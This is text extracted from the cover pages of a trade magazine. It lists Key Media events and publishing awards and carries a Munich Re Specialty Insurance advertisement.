NEW ZEALAND MORTGAGE AWARDS
21
21
Canadian LAW AWARDS
ASIA
LegalTech Summit C A N A D A
National HR Directors Summit
HR Mental Health Summit
HR Summit
VIRTUAL SUMMIT
B R I S B A N E
AUSTRALIA AND NEW ZEALAND
masterclass
WOMEN IN INSURANCE SUMMIT
Employee Engagement C A N A D A
SAFETY LEADERS SUMMIT
WOMEN IN SAFETY
FIND OUT MORE ABOUT US AT WWW.KEYMEDIA.COM
MPAS
PUBLISH AWARDS
TABBIES
AZBEES
THE BIG 95
COPA
APEX
MAGGIES
EXCELLENCE AWARDS
BELL AWARDS
NMA: B2B
SYDNEY | AUCKLAND | DENVER | LONDON | MANILA | SINGAPORE | TORONTO
00_Insert OFC IFC IBC OBC-SUBBED.indd 3
22/10/2021 2:05:56 am
Specialty solutions from a partner that has your back Munich Re brings together the strength and expertise of a global leader, along with simple access to a broad array of specialty insurance solutions, all from one trusted source. Our select partners benefit from our deep knowledge, innovative approaches to managing and underwriting risk, and the backing and stability that only Munich Re can offer, leaving you to focus on what matters most. Learn more at munichreus.ly/BRC.
Munich Re Specialty Insurance is a description for the insurance business operations of affiliated companies in the Munich Re Group that share a common directive to offer and deliver specialty property and casualty insurance products and services in North America. Products and services are underwritten and provided by American Alternative Insurance Corporation and The Princeton Excess and Surplus Lines Insurance Company (PESLIC).
Munich Re Specialty Insurance
00_Insert OFC IFC IBC OBC-SUBBED.indd 4
22/10/2021 2:06:00 am